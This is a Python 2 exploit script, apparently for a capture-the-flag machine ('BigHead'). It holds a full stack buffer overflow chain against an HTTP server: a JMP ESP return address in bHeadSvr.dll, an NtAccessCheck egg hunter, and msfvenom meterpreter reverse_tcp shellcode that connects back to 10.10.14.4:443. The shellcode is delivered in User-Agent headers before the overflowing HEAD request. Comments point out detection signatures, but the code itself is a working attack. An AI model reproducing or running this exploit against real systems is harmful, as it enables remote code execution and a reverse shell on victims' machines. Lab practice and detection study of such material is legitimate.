- from socket import socket, AF_INET, SOCK_STREAM
- import binascii
- import requests
- import time
- # reversing the code -> we enter the vulnerable code if
- # len(req) <= 219
- # s = "HEAD / HTTP/1.1\r\n\r\n"
- # print len(s)
- # 19
- # so we have 200 bytes
- # function4, leave at address: 0040194C
- # Egg hunter using NtAccessCheck
- # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
- #my $egghunter =
- #"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
- #"\x77\x30\x30\x74". # this is the marker/tag: w00t
- #"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
- # egg hunter using NtDisplayString
- #my $egghunter =
- #"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
- #"w00t".
- #"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# Egg-hunter tag. The hunter scans memory for this 4-byte marker; the egg that
# is prepended to the shellcode below is the tag written twice (see `egg`).
PWND = "\x50\x57\x4e\x44" # string "PWND"
# NtAccessCheck variant of the egg hunter (the NtDisplayString variant is the
# commented-out alternative above). Only the tag bytes differ from the
# reference code; the rest is taken verbatim.
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += PWND
egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
# we have ESP pointing after EIP, and EAX pointing at the start of the buffer
# !mona find -s "\xff\xe4" -m bHeadSvr.dll
# Return address that overwrites EIP. Presumably the little-endian form of an
# address inside bHeadSvr.dll located with the mona search above; the module
# name is the detection hook (a non-ASLR module whose gadget address is fixed).
JMP_ESP = "\xF0\x12\x50\x62"
#JMP_EAX = "\xF2\x12\x50\x62"
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=443 EXITFUNC=process -f python -b '\x00\x0a\x0d\xff' -v shellcode
# 368 bytes
# Stage-1 payload: the doubled tag followed by the encoded msfvenom output.
# The encoded bytes are opaque and cannot be audited by reading; the doubled
# "PWND" tag at the front is the only stable, searchable signature in it.
egg = PWND + PWND
shellcode = egg
shellcode += "\xd9\xc2\xd9\x74\x24\xf4\xba\x8a\x1f\x9e\x85\x5f"
shellcode += "\x31\xc9\xb1\x56\x31\x57\x18\x83\xc7\x04\x03\x57"
shellcode += "\x9e\xfd\x6b\x79\x76\x83\x94\x82\x86\xe4\x1d\x67"
shellcode += "\xb7\x24\x79\xe3\xe7\x94\x09\xa1\x0b\x5e\x5f\x52"
shellcode += "\x98\x12\x48\x55\x29\x98\xae\x58\xaa\xb1\x93\xfb"
shellcode += "\x28\xc8\xc7\xdb\x11\x03\x1a\x1d\x56\x7e\xd7\x4f"
shellcode += "\x0f\xf4\x4a\x60\x24\x40\x57\x0b\x76\x44\xdf\xe8"
shellcode += "\xce\x67\xce\xbe\x45\x3e\xd0\x41\x8a\x4a\x59\x5a"
shellcode += "\xcf\x77\x13\xd1\x3b\x03\xa2\x33\x72\xec\x09\x7a"
shellcode += "\xbb\x1f\x53\xba\x7b\xc0\x26\xb2\x78\x7d\x31\x01"
shellcode += "\x03\x59\xb4\x92\xa3\x2a\x6e\x7f\x52\xfe\xe9\xf4"
shellcode += "\x58\x4b\x7d\x52\x7c\x4a\x52\xe8\x78\xc7\x55\x3f"
shellcode += "\x09\x93\x71\x9b\x52\x47\x1b\xba\x3e\x26\x24\xdc"
shellcode += "\xe1\x97\x80\x96\x0f\xc3\xb8\xf4\x47\x20\xf1\x06"
shellcode += "\x97\x2e\x82\x75\xa5\xf1\x38\x12\x85\x7a\xe7\xe5"
shellcode += "\x9c\x6d\x18\x39\x26\xfd\xe6\xba\x56\xd7\x2c\xee"
shellcode += "\x06\x4f\x84\x8f\xcd\x8f\x29\x5a\x7b\x91\xbd\x6f"
shellcode += "\x71\x9f\x39\x18\x87\x9f\x40\x63\x0e\x79\x12\xc3"
shellcode += "\x40\xd6\xd3\xb3\x20\x86\xbb\xd9\xaf\xf9\xdc\xe1"
shellcode += "\x7a\x92\x77\x0e\xd2\xca\xef\xb7\x7f\x80\x8e\x38"
shellcode += "\xaa\xec\x91\xb3\x5e\x10\x5f\x34\x2b\x02\x88\x23"
shellcode += "\xd3\xda\x49\xc6\xd3\xb0\x4d\x40\x84\x2c\x4c\xb5"
shellcode += "\xe2\xf2\xaf\x90\x71\xf4\x50\x65\x43\x8e\x67\xf3"
shellcode += "\xeb\xf8\x87\x13\xeb\xf8\xd1\x79\xeb\x90\x85\xd9"
shellcode += "\xb8\x85\xc9\xf7\xad\x15\x5c\xf8\x87\xca\xf7\x90"
shellcode += "\x25\x34\x3f\x3f\xd6\x13\x43\x38\x28\xe1\x6c\xe1"
shellcode += "\x40\x19\x2d\x11\x90\x73\xad\x41\xf8\x88\x82\x6e"
shellcode += "\xc8\x71\x09\x27\x40\xfb\xdc\x85\xf1\xfc\xf4\x48"
shellcode += "\xaf\xfd\xfb\x50\x40\x87\x74\x66\xa1\x78\x9d\x03"
shellcode += "\xa2\x78\xa1\x35\x9f\xae\x98\x43\xde\x72\x9f\x5c"
shellcode += "\x55\xd6\xb6\xf6\x95\x44\xc8\xd2"
# Target configuration. The TCP connection in stage 2 goes to `host`/`port`,
# while `header_host` is sent as the HTTP Host header and is also used as the
# URL host for the stage-1 requests, so it has to resolve locally
# (presumably via a hosts-file entry — not handled by this script).
host = "10.10.10.112"
port = 80
header_host = "dev.bighead.htb"
# Local-lab settings left in place by the author.
#host = "127.0.0.1"
#port = 8080
#header_host = "127.0.0.1"
# Stage 1: deliver the egg + shellcode to the server inside the User-Agent
# header. Python 2 syntax (print statement, str payloads) throughout.
print "[+] Stage 1: sending shellcode"
# Headers set to None are dropped by `requests`, so only User-Agent and
# Connection are actually sent. A User-Agent carrying raw non-printable
# bytes and the doubled "PWND" tag is an easy thing to alert on.
h = {'User-Agent': shellcode, 'Content-Encoding': None, 'Accept-Encoding': None, 'Accept': None, 'Connection': 'close'}
# Sent four times; presumably to leave several copies of the egg resident in
# the server process for the hunter to find -- the count is not explained.
# Note the commented-out POST variant references an undefined name `shell`.
for i in range(0, 4):
    print "[*] req " + str(i) + " sent"
    #r = requests.post("http://" + header_host + "/", headers=h, data=shell)
    r = requests.get("http://" + header_host + "/", headers=h)
    print "> " + str(len(r.text))
    time.sleep(1)
# Stage 2: overflow via a HEAD request whose path is the hex-encoded buffer.
print "[+] Stage 2: exploit"
# Offsets are given in hex characters and halved to raw bytes, because the
# buffer is hexlified before it is placed in the request path (the server is
# presumably decoding it). Python 2 integer division is relied on here:
# under Python 3, 72/2 is 36.0 and the string multiplication below fails.
EIP_OFFSET = 72/2
BUF_FILL = 120/2  # unused
# Padding up to EIP, the return address, then the hunter; the hunter locates
# the stage-1 egg and jumps to it.
buf = "\x41"*EIP_OFFSET
buf += JMP_ESP
buf += egghunter
# Loop runs exactly once; left in this form by the author.
for i in range(0,1):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((host, port))
    # A HEAD request with a long, purely hexadecimal path (and a Host header
    # that differs from the connected IP) is the wire-level signature to
    # look for in proxy or server logs.
    sock.send("HEAD /" + binascii.hexlify(buf) + " HTTP/1.1\r\nHost: " + header_host + "\r\nConnection: close\r\n\r\n")
    print "[*] req " + str(i) + " sent"
    # recv may return an empty string if the server drops the connection
    # without answering.
    print "> " + sock.recv(1024)
    sock.close()